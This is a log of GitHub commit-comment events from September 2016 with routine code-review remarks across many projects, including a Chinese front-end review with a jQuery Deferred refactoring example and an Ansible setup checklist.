{"id":"4581440580","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073929,"position":138,"line":138,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:26:07Z","updated_at":"2016-09-19T05:26:07Z","body":"恩恩，意义不太明确，犯懒了。。。应该改"}},"created_at":"2016-09-19T05:26:07Z"}
{"id":"4581446360","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073955,"position":264,"line":264,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:29:09Z","updated_at":"2016-09-19T05:29:09Z","body":"恩恩"}},"created_at":"2016-09-19T05:29:09Z"}
{"id":"4581448354","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073960,"position":268,"line":268,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:30:14Z","updated_at":"2016-09-19T05:30:14Z","body":"恩恩，这样写，编辑器不报错，总忘了。。。\r\n一定注意！"}},"created_at":"2016-09-19T05:30:14Z"}
{"id":"4581449053","type":"CommitCommentEvent","actor":{"login":"dennishvo"},"repo":{"name":"dennishvo/mailstripper"},"payload":{"comment":{"id":19073962,"position":121,"line":96,"path":"mstrp.py","commit_id":"374752e56f9c7fd1aec5d7c1d2df86dbebd25026","created_at":"2016-09-19T05:30:33Z","updated_at":"2016-09-19T05:30:33Z","body":"Consider adding the replace string to the config file."}},"created_at":"2016-09-19T05:30:33Z"}
{"id":"4581452888","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19073966,"position":34,"line":89,"path":"app/models/user_avatar.rb","commit_id":"5b3cd3fac9261a24ba021b57dbba0b3b4f349e3f","created_at":"2016-09-19T05:32:40Z","updated_at":"2016-09-19T05:32:40Z","body":"Stray `p`? :P"}},"created_at":"2016-09-19T05:32:40Z"}
{"id":"4581462632","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19073989,"position":null,"line":null,"path":null,"commit_id":"0a6f82a24ccf13623fa39548b56957ac390a088b","created_at":"2016-09-19T05:37:57Z","updated_at":"2016-09-19T05:37:57Z","body":"Note this was a public inner class... if it was static or otherwise be another story."}},"created_at":"2016-09-19T05:37:57Z"}
{"id":"4581463958","type":"CommitCommentEvent","actor":{"login":"oleksiyk"},"repo":{"name":"oleksiyk/kafka"},"payload":{"comment":{"id":19073991,"position":76,"line":185,"path":"lib/connection.js","commit_id":"7dabcf2bf7c361f2514bb70d42d7c9f97ef67a2f","created_at":"2016-09-19T05:38:38Z","updated_at":"2016-09-19T05:38:38Z","body":"How often does it happen? Is it after some huge amount of messages sent or semi-random? I wonder if its integer overflow or something.."}},"created_at":"2016-09-19T05:38:38Z"}
{"id":"4581464635","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19073993,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T05:39:02Z","updated_at":"2016-09-19T05:39:02Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-19T05:39:02Z"}
{"id":"4581465153","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"RBMHTechnology/eventuate"},"payload":{"comment":{"id":19073995,"position":19,"line":156,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/log/EventLog.scala","commit_id":"e33d52d1da7eea9380d8377c1792af9b14d3b4f3","created_at":"2016-09-19T05:39:18Z","updated_at":"2016-09-19T05:39:18Z","body":"Sorry for nit-picking but it's easier to read if this declaration is located with other writes operations are located e.g. after `writeDeletionMetadata`. Otherwise +1 on this commit."}},"created_at":"2016-09-19T05:39:18Z"}
{"id":"4581465724","type":"CommitCommentEvent","actor":{"login":"HimbeersaftLP"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19073996,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-19T05:39:36Z","updated_at":"2016-09-19T05:39:36Z","body":"Okay, will convert it when I get back from school."}},"created_at":"2016-09-19T05:39:36Z"}
{"id":"4581467507","type":"CommitCommentEvent","actor":{"login":"complxalgorithm"},"repo":{"name":"complxalgorithm/complxalgorithm.github.io"},"payload":{"comment":{"id":19073999,"position":null,"line":null,"path":null,"commit_id":"9d0e913d89ee8debe74519da35b19b338e63707e","created_at":"2016-09-19T05:40:31Z","updated_at":"2016-09-19T05:40:31Z","body":"miscolored*"}},"created_at":"2016-09-19T05:40:31Z"}
{"id":"4581473666","type":"CommitCommentEvent","actor":{"login":"mattab"},"repo":{"name":"piwik/piwik"},"payload":{"comment":{"id":19074010,"position":23,"line":23,"path":"plugins/Goals/Updates/3.0.0-b1.php","commit_id":"dbbf8084e21d5be4cd7fd53c6b478d41449f41fc","created_at":"2016-09-19T05:43:39Z","updated_at":"2016-09-19T05:43:39Z","body":"Here we should use the new Update API: http://developer.piwik.org/guides/migrate-piwik-2-to-3#updates-and-sql-schema-migrations"}},"created_at":"2016-09-19T05:43:39Z"}
{"id":"4581473914","type":"CommitCommentEvent","actor":{"login":"vlad-i"},"repo":{"name":"adrcotfas/Goodtime"},"payload":{"comment":{"id":19074011,"position":null,"line":null,"path":null,"commit_id":"e9cda8ce31273eb1dae60ac368217a1ba1a6e4b2","created_at":"2016-09-19T05:43:48Z","updated_at":"2016-09-19T05:43:48Z","body":"thanks, was used to have it in the AndroidManifest.xml file, I saw it now. Cheers!"}},"created_at":"2016-09-19T05:43:48Z"}
{"id":"4581474784","type":"CommitCommentEvent","actor":{"login":"Jiawei-Shao"},"repo":{"name":"Jiawei-Shao/WebGL"},"payload":{"comment":{"id":19074014,"position":null,"line":null,"path":null,"commit_id":"344bf8e275c124569d5f516786254b19e8f08a12","created_at":"2016-09-19T05:44:15Z","updated_at":"2016-09-19T05:44:15Z","body":"@qkmiao Please help to review"}},"created_at":"2016-09-19T05:44:15Z"}
{"id":"4581476379","type":"CommitCommentEvent","actor":{"login":"mattab"},"repo":{"name":"piwik/piwik"},"payload":{"comment":{"id":19074018,"position":13,"line":200,"path":"tests/resources/OmniFixture-dump.sql","commit_id":"dbbf8084e21d5be4cd7fd53c6b478d41449f41fc","created_at":"2016-09-19T05:45:03Z","updated_at":"2016-09-19T05:45:03Z","body":"Curious: did you generate this using the console command documented in: https://github.com/piwik/piwik/tree/master/tests#keep-omnifixture-up-to-date?"}},"created_at":"2016-09-19T05:45:03Z"}
{"id":"4581478485","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074021,"position":320,"line":320,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:46:08Z","updated_at":"2016-09-19T05:46:08Z","body":"1、在绑定事件这里主要是获取绑定对象，然后参与行为，获取完绑定事件对象以后，传给行为函数就可以了，其他和绑定事件没关系的参数就不应该放到这里来传了；\r\n\r\n>另外，你很多函数的名字都太长了，函数应该尽量定义为原子行为，然后以配置参数去调控行为细节\r\n\r\n2、我写的时候有这个想法，把业务抽象成工具函数，灵活性高一些，但是总是想不好，越写越乱。。。【这次开发招商平台的卡号编辑页面也是遇到了这个问题】我还没有怎么解决这个问题的思路。。。\r\n\r\n"}},"created_at":"2016-09-19T05:46:08Z"}
{"id":"4581481214","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19074024,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-19T05:47:30Z","updated_at":"2016-09-19T05:47:30Z","body":"Thanks! :)"}},"created_at":"2016-09-19T05:47:30Z"}
{"id":"4581482495","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"RBMHTechnology/eventuate"},"payload":{"comment":{"id":19074025,"position":12,"line":67,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/Recovery.scala","commit_id":"a4c882545d4d367174450133d367548a04edf1e2","created_at":"2016-09-19T05:48:08Z","updated_at":"2016-09-19T05:48:08Z","body":"Shouldn't this be rather a method on `Recovery` that takes a `RecoveryLink` parameter?"}},"created_at":"2016-09-19T05:48:08Z"}
{"id":"4581483576","type":"CommitCommentEvent","actor":{"login":"krasserm"},"repo":{"name":"RBMHTechnology/eventuate"},"payload":{"comment":{"id":19074027,"position":14,"line":69,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/Recovery.scala","commit_id":"a4c882545d4d367174450133d367548a04edf1e2","created_at":"2016-09-19T05:48:41Z","updated_at":"2016-09-19T05:48:41Z","body":"API doc?"}},"created_at":"2016-09-19T05:48:41Z"}
{"id":"4581488346","type":"CommitCommentEvent","actor":{"login":"jgn-epp"},"repo":{"name":"elmadev/musicman"},"payload":{"comment":{"id":19074035,"position":null,"line":null,"path":null,"commit_id":"f7372ebaaaf1c648fbff5dbfc07f24d17b0a575f","created_at":"2016-09-19T05:51:05Z","updated_at":"2016-09-19T05:51:05Z","body":"advanced stuff"}},"created_at":"2016-09-19T05:51:05Z"}
{"id":"4581488672","type":"CommitCommentEvent","actor":{"login":"Krakenfall"},"repo":{"name":"Krakenfall/taco-bot"},"payload":{"comment":{"id":19074036,"position":null,"line":null,"path":null,"commit_id":"78503a47259f94fb29460f039c6184840e4c2841","created_at":"2016-09-19T05:51:13Z","updated_at":"2016-09-19T05:51:13Z","body":"As long as using require(CONFIG_FILE_NAME) dynamically loads the contents of the file, this is ok. There are times when the config is updated by the app, such as the case where /toggletestmode is called, where the config would need to be updated. I added the config shuffling to catch this specific case. The config object would be updated and maintained in nodeserver.js's memory."}},"created_at":"2016-09-19T05:51:13Z"}
{"id":"4581495772","type":"CommitCommentEvent","actor":{"login":"9xXx9"},"repo":{"name":"9xXx9/PlayWithAnsible"},"payload":{"comment":{"id":19074042,"position":null,"line":null,"path":null,"commit_id":"bfabffbf5ecd43d06c9a842b665a5e0738e8efe8","created_at":"2016-09-19T05:54:40Z","updated_at":"2016-09-19T05:54:40Z","body":"Prerequisite:\r\n\r\nInstall Python\r\n$ apt-get install python\r\n\r\nInstall Ansible\t\r\n$ sudo apt-get install ansible\r\n\r\nInstall pip\r\n$ sudo easy_install pip\r\n\r\nInstall following\r\n$ sudo pip install paramiko PyYAML Jinja2 httplib2 \r\n\r\nInstall boto\r\n$ pip install boto\r\n\r\nVerify host\r\n$ ansible localhost -m ping\r\n\r\nCreate boto file with aws access credentials\r\n\r\nCreate a key file (using ssh-keygen or using AWS Keypair)\r\nchange permission \r\n$ sudo chmod 400 <yourkeyfile.pem>\r\n\r\nDownload ec2.py, ec2.ini copy under ansible directory\r\nhttps://raw.githubusercontent.com/ansible/ansible/devel/contrib/inventory/ec2.py\r\nhttps://raw.githubusercontent.com/ansible/ansible/devel/contrib/inventory/ec2.ini\r\n\r\n\r\n####################################################################\r\nStart with following\r\nexecute at shell : $ ./createVM.sh\r\n"}},"created_at":"2016-09-19T05:54:40Z"}
{"id":"4581498196","type":"CommitCommentEvent","actor":{"login":"raveit65"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19074047,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-19T05:55:53Z","updated_at":"2016-09-19T05:55:53Z","body":"Np, i will write News for packages w/o changes like mate-backgrounds, mate-icon-theme for myself.\r\nThan only a few packages are left......"}},"created_at":"2016-09-19T05:55:53Z"}
{"id":"4581500300","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074050,"position":367,"line":367,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:56:58Z","updated_at":"2016-09-19T05:56:58Z","body":"因为我优化代码的时候把大函数拆分了，这段代码之前的`this`都是`_this`,我犯懒就没有改直接在上面加了一句话\r\n`var this = _this;`"}},"created_at":"2016-09-19T05:56:58Z"}
{"id":"4581502481","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19074052,"position":null,"line":null,"path":null,"commit_id":"7af1e2eceda3353b9533cb7c7ff2901a92ea4ebc","created_at":"2016-09-19T05:57:59Z","updated_at":"2016-09-19T05:57:59Z","body":"I am not sure if it is related, but now `void-mklive` running `mklive.sh` fails for me with a (seemingly) endless loop printing:\r\n```\r\n/usr/lib/dracut/modules.d/50drm/module-setup.sh: line 28: warning: command substitution: ignored null byte in input\r\n```\r\nI know that `mklive.sh` worked yesterday."}},"created_at":"2016-09-19T05:57:59Z"}
{"id":"4581503956","type":"CommitCommentEvent","actor":{"login":"pkovac"},"repo":{"name":"WeaveTeam/WeaveJS"},"payload":{"comment":{"id":19074054,"position":null,"line":null,"path":null,"commit_id":"d70c94966036f8abe9df24225a0aca8316d43c8b","created_at":"2016-09-19T05:58:44Z","updated_at":"2016-09-19T05:58:44Z","body":"There's no need to create closures here, startTask will invoke the iterate function and asyncComplete with the appropriate 'this.' Additionally, the iterate function is used as a token for identifying the task, and as such, it should not be made anew every time."}},"created_at":"2016-09-19T05:58:44Z"}
{"id":"4581504941","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074056,"position":445,"line":445,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:59:14Z","updated_at":"2016-09-19T05:59:14Z","body":"恩恩，我试试"}},"created_at":"2016-09-19T05:59:14Z"}
{"id":"4581506373","type":"CommitCommentEvent","actor":{"login":"linezero"},"repo":{"name":"linezero/NETCoreBBS"},"payload":{"comment":{"id":19074059,"position":null,"line":null,"path":null,"commit_id":"91f611688879944dcbdccc5de803393aa74791f0","created_at":"2016-09-19T05:59:53Z","updated_at":"2016-09-19T05:59:53Z","body":"#2 "}},"created_at":"2016-09-19T05:59:53Z"}
{"id":"4581507694","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074067,"position":446,"line":446,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T06:00:23Z","updated_at":"2016-09-19T06:00:23Z","body":"```\r\nvar errorHandler = function ( msg ) {\r\n    Alert.show( typeof msg === \"string\" ? msg  : \"操作失败\", Loading.hide );\r\n};\r\n\r\nLoading.show( \"正在加载...\" );\r\n\r\n$.ajax( {\r\n    url: '/order/' + action,\r\n    data: params,\r\n    type: 'GET',\r\n    dataType: 'json'\r\n} ).done( function ( response ) {\r\n    if ( response ) {\r\n        response.ret === 0 ? callback( response.content || {} ) : errorHandler( response.msg );\r\n    } else {\r\n        errorHandler();\r\n    }\r\n} ).fail( errorHandler );\r\n```\r\n\r\n既然传入了callback，dtd在这里就失去了它的意义，因为callback已经替调用者实现了异步执行的目的.\r\n\r\n如果按照使用jQuery.Deferred的方式，你可以尝试这样写：\r\n\r\n```\r\nfunction syncData( action, params ) {\r\n    // Get started\r\n    // newDefer只是本次ajax请求的中间代理\r\n    var newDefer = $.Deferred( function () {\r\n        Loading.show( \"正在加载...\" );\r\n    } );\r\n\r\n    // 虽然Ajax本身也是延迟对象，但遗憾的是\r\n    // 我们所定义的『成功状态』并不单单指请求成功\r\n    // 所以我们需要一个新的延迟对象对Ajax请求做中间处理\r\n    // 触发真正的、我们所定义的成功和失败状态\r\n    // 并且，这个新的延迟对象newDefer，syncData的调用者不需要也不应该感知到\r\n    // 对syncData的调用者而言，它们只关心两件事情：\r\n    //      1、成功了(我们定义的)，你把结果返回给我\r\n    //      2、失败了(我们定义的)，我不做任何事情，你把错误消息提示给用户\r\n    // 所以newDefer只有fail方法而没有done方法，因为它不需要处理成功以后的事情\r\n    newDefer.progress( function ( response ) {\r\n        if ( !response || response.ret !== 0 ) {\r\n            newDefer.reject( response && response.msg ? response.msg : \"\" );\r\n        } else {\r\n            newDefer.resolve( response.content || {} );\r\n        }\r\n    } );\r\n\r\n    newDefer.fail( function ( msg ) {\r\n        Alert.show( msg || \"操作失败\" );\r\n    } );\r\n\r\n    // Request finish\r\n    newDefer.always( function () {\r\n        Loading.hide();\r\n    } );\r\n\r\n    $.getJSON( '/order/' + action, params ).done( newDefer.notify ).fail( newDefer.reject );\r\n\r\n    return newDefer.promise();\r\n}\r\n\r\nfunction getSomething() {\r\n    syncData( \"someAction\", {} ).done( function ( result ) {\r\n        // bla bla bla...\r\n    } );\r\n}\r\n```\r\n"}},"created_at":"2016-09-19T06:00:23Z"}
{"id":"4581511068","type":"CommitCommentEvent","actor":{"login":"saritakh"},"repo":{"name":"hirenvadalia/pbspro"},"payload":{"comment":{"id":19074102,"position":544,"line":11945,"path":"test/fw/ptl/lib/pbs_testlib.py","commit_id":"dbe342f056c469515352b7eef0668240629ea99c","created_at":"2016-09-19T06:01:47Z","updated_at":"2016-09-19T06:01:47Z","body":"Remove \"-N\" option while inserting vnodes.  Since it is needed only for Windows."}},"created_at":"2016-09-19T06:01:47Z"}
{"id":"4581514145","type":"CommitCommentEvent","actor":{"login":"SiloGit"},"repo":{"name":"electronut/pp"},"payload":{"comment":{"id":19074104,"position":2,"line":2,"path":"ascii/ascii.py","commit_id":"9428863afb66d141aa67a51f9e1a64ee268429f2","created_at":"2016-09-19T06:02:43Z","updated_at":"2016-09-19T06:02:43Z","body":"jhjhbhkj"}},"created_at":"2016-09-19T06:02:43Z"}
{"id":"4581515666","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074107,"position":392,"line":392,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T06:03:22Z","updated_at":"2016-09-19T06:03:22Z","body":"T-T"}},"created_at":"2016-09-19T06:03:22Z"}
{"id":"4581518215","type":"CommitCommentEvent","actor":{"login":"Olfredos6"},"repo":{"name":"VERSALIFESA/VersaLifeHealth"},"payload":{"comment":{"id":19074111,"position":10,"line":25,"path":"System/VERSALIFE MEDICAL/VERSALIFE MEDICAL/frmAssessment.cs","commit_id":"9ac7ab21b6c9171436e196309dbdbe68697c4563","created_at":"2016-09-19T06:04:36Z","updated_at":"2016-09-19T06:04:36Z","body":"Tee, please do not forget to clean up code by removing empty methods that we will not use like these ones"}},"created_at":"2016-09-19T06:04:36Z"}
{"id":"4581524163","type":"CommitCommentEvent","actor":{"login":"spk921"},"repo":{"name":"e-lab/torch7-demos"},"payload":{"comment":{"id":19074118,"position":19,"line":30,"path":"RNN-train-sample/train.lua","commit_id":"98bebf55cf4f04e4231577f037c7769b6231f647","created_at":"2016-09-19T06:07:19Z","updated_at":"2016-09-19T06:07:19Z","body":"Why did you oneHot respect to Y vector? Not S Vector which is random. I don't think this is correct. \r\nIsn't it input should be random and Y vector is create respect to S vector. \r\n![screen shot 2016-09-19 at 2 03 28 am](https://cloud.githubusercontent.com/assets/13938697/18623622/81c3290a-7e0d-11e6-8782-ee69e31e0e97.png)\r\n"}},"created_at":"2016-09-19T06:07:19Z"}
{"id":"4581524809","type":"CommitCommentEvent","actor":{"login":"caoli5288"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19074120,"position":null,"line":null,"path":null,"commit_id":"ddd7482e37060e0a23badc6b7f80e3f8e2157560","created_at":"2016-09-19T06:07:38Z","updated_at":"2016-09-19T06:07:38Z","body":":+1: "}},"created_at":"2016-09-19T06:07:38Z"}
{"id":"4581525150","type":"CommitCommentEvent","actor":{"login":"Orhideous"},"repo":{"name":"everypony/tabun"},"payload":{"comment":{"id":19074122,"position":51,"line":92,"path":"classes/modules/search/Search.class.php","commit_id":"84869c9ba392d889c9d021ec1924b70d4a9b266f","created_at":"2016-09-19T06:07:47Z","updated_at":"2016-09-19T06:07:47Z","body":"Кстати, а что так?"}},"created_at":"2016-09-19T06:07:47Z"}
{"id":"4581526944","type":"CommitCommentEvent","actor":{"login":"caoli5288"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19074125,"position":null,"line":null,"path":null,"commit_id":"60c98f4575584688d5c387ba380e716af2dfbb35","created_at":"2016-09-19T06:08:35Z","updated_at":"2016-09-19T06:08:35Z","body":":+1: "}},"created_at":"2016-09-19T06:08:35Z"}
{"id":"4581535561","type":"CommitCommentEvent","actor":{"login":"bs0000"},"repo":{"name":"bs0000/hello-world"},"payload":{"comment":{"id":19074143,"position":null,"line":null,"path":null,"commit_id":"ae6cf7bceb03d61347f50bd801eebae70abedf0b","created_at":"2016-09-19T06:12:29Z","updated_at":"2016-09-19T06:12:29Z","body":"I think there is a bug."}},"created_at":"2016-09-19T06:12:29Z"}
{"id":"4581536234","type":"CommitCommentEvent","actor":{"login":"cjjnjust"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19074145,"position":63,"line":63,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesCipher.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T06:12:45Z","updated_at":"2016-09-19T06:12:45Z","body":"IMO, it would be better to print warning and fallback to use a support one as default, such as \"AES/CTR/Nopadding\"."}},"created_at":"2016-09-19T06:12:45Z"}
{"id":"4581539716","type":"CommitCommentEvent","actor":{"login":"volkerstampa"},"repo":{"name":"RBMHTechnology/eventuate"},"payload":{"comment":{"id":19074152,"position":19,"line":156,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/log/EventLog.scala","commit_id":"e33d52d1da7eea9380d8377c1792af9b14d3b4f3","created_at":"2016-09-19T06:14:12Z","updated_at":"2016-09-19T06:14:12Z","body":"Actually I intentionally placed it close to the `recoverStateFailure` because I thought both are related to the `EventLogClock`, but you are probably right it fits better close to the other writes. So +1 for this."}},"created_at":"2016-09-19T06:14:12Z"}
{"id":"4581544559","type":"CommitCommentEvent","actor":{"login":"vmorri"},"repo":{"name":"sravyakalva/PriceSavior"},"payload":{"comment":{"id":19074160,"position":null,"line":null,"path":null,"commit_id":"cd6bf1e7b8f9b8488da28e5efa71b91d88f7a13d","created_at":"2016-09-19T06:16:08Z","updated_at":"2016-09-19T06:16:08Z","body":"Was able to create a dynamic table using HTML DOMS and Javascript. The price and quantity restrict the user from using anything but numbers. Current issues revolve around total which is not automatically calculating yet. Work on the history if you can; we'll worry bout total later. "}},"created_at":"2016-09-19T06:16:08Z"}
{"id":"4581545359","type":"CommitCommentEvent","actor":{"login":"Bazze"},"repo":{"name":"Bazze/prestashop-orderemails"},"payload":{"comment":{"id":19074162,"position":null,"line":null,"path":null,"commit_id":"32aa0d5f9e087821bd58a62f83e4ed9d1df352f9","created_at":"2016-09-19T06:16:26Z","updated_at":"2016-09-19T06:16:26Z","body":"Hello @anandmohancs! I'm sorry, but I can't help you with that. This is not a module that I maintain anymore, it should be considered legacy code. Feel free to use or modify it in any way you want though."}},"created_at":"2016-09-19T06:16:26Z"}
{"id":"4581546361","type":"CommitCommentEvent","actor":{"login":"basarat"},"repo":{"name":"danielearwicker/immuto-example"},"payload":{"comment":{"id":19074163,"position":3,"line":2,"path":"components/ShelfEditor.tsx","commit_id":"c132d4f3da6095c2069fb85ae97989d104057139","created_at":"2016-09-19T06:16:50Z","updated_at":"2016-09-19T06:16:50Z","body":"Probably a bad idea to bundle `TextInput` into immuto-react. Reasons: \r\n\r\n* layout + styling: I would want that for my inputs\r\n* Validation: I have something very similar to `Property` that I use that also does validation. Again it does that via *seemingly* two way data binding (value / onChange). This thing is called `Field` (very similar to your `property`) but also has `validators` which are `value => Promise<string|undefined>` where a `string` result is an error, (so server side or client side validators are equally supported). I will write / clean that up for OSS at some point but nonethless the motive here was saying that `TextInput` should probably be out of `immuto-react`. \r\n\r\nThat said feel free to bundle them up and it doesn't bother me. Just sharing / learning :rose:"}},"created_at":"2016-09-19T06:16:50Z"}
{"id":"4581554549","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19074175,"position":null,"line":null,"path":null,"commit_id":"77a5934753c800a0cd0418d35f28cbecbbebdf0c","created_at":"2016-09-19T06:20:11Z","updated_at":"2016-09-19T06:20:11Z","body":"Nice, thanks. Did you also look into whether it's possible to check for a connected LCD already in u-boot and to let u-boot use the correct DT automagically (this is how FriendlyARM does it with their NanoPis and a variety of different TS LCD)"}},"created_at":"2016-09-19T06:20:11Z"}
{"id":"4581556257","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19074178,"position":null,"line":null,"path":null,"commit_id":"77a5934753c800a0cd0418d35f28cbecbbebdf0c","created_at":"2016-09-19T06:20:50Z","updated_at":"2016-09-19T06:20:50Z","body":"Maybe, I didn't do it. "}},"created_at":"2016-09-19T06:20:50Z"}
{"id":"4581556626","type":"CommitCommentEvent","actor":{"login":"yhoiseth"},"repo":{"name":"voku/Stringy"},"payload":{"comment":{"id":19074179,"position":null,"line":null,"path":null,"commit_id":"3096bc84d887ad3c974410a7e17b369b4f2843d8","created_at":"2016-09-19T06:20:58Z","updated_at":"2016-09-19T06:20:58Z","body":"Cool, I think I'll try it out."}},"created_at":"2016-09-19T06:20:58Z"}
{"id":"4581557830","type":"CommitCommentEvent","actor":{"login":"gupta-shantanu"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19074184,"position":30,"line":182,"path":"geocodertest.py","commit_id":"e58dc8da454668cce1ca10311328d366afacb01b","created_at":"2016-09-19T06:21:26Z","updated_at":"2016-09-19T06:21:26Z","body":"@shubhiD the way I understood the problem was , the places with lesser content (pics,reviews etc.) would have lesser views. Even if we get the place ID and fail to get content that is actually visible to visitor, it should count as if place id wasn't found.\r\nIf that's not what we wanted we can still change it."}},"created_at":"2016-09-19T06:21:26Z"}
{"id":"4581562980","type":"CommitCommentEvent","actor":{"login":"volkerstampa"},"repo":{"name":"RBMHTechnology/eventuate"},"payload":{"comment":{"id":19074196,"position":12,"line":67,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/Recovery.scala","commit_id":"a4c882545d4d367174450133d367548a04edf1e2","created_at":"2016-09-19T06:23:31Z","updated_at":"2016-09-19T06:23:31Z","body":"No strong opinion on this ... so fine for me."}},"created_at":"2016-09-19T06:23:31Z"}
{"id":"4581563140","type":"CommitCommentEvent","actor":{"login":"volkerstampa"},"repo":{"name":"RBMHTechnology/eventuate"},"payload":{"comment":{"id":19074197,"position":14,"line":69,"path":"eventuate-core/src/main/scala/com/rbmhtechnology/eventuate/Recovery.scala","commit_id":"a4c882545d4d367174450133d367548a04edf1e2","created_at":"2016-09-19T06:23:35Z","updated_at":"2016-09-19T06:23:35Z","body":"OK."}},"created_at":"2016-09-19T06:23:35Z"}
{"id":"4581564839","type":"CommitCommentEvent","actor":{"login":"DahaiJarvis"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074200,"position":407,"line":407,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T06:24:18Z","updated_at":"2016-09-19T06:24:18Z","body":"建议将class和内容都一次性生成，getOrderContent和getWaveContent里面再去赋值就好了，免得class和内容以后变化后还需要多处修改"}},"created_at":"2016-09-19T06:24:18Z"}
{"id":"4581567391","type":"CommitCommentEvent","actor":{"login":"basarat"},"repo":{"name":"danielearwicker/immuto-example"},"payload":{"comment":{"id":19074203,"position":3,"line":2,"path":"components/ShelfEditor.tsx","commit_id":"c132d4f3da6095c2069fb85ae97989d104057139","created_at":"2016-09-19T06:25:20Z","updated_at":"2016-09-19T06:25:20Z","body":"Leave it however you have it. Or move it however you want it. Don't let my comment stop / slow you down in any way :rose: :heart: "}},"created_at":"2016-09-19T06:25:20Z"}
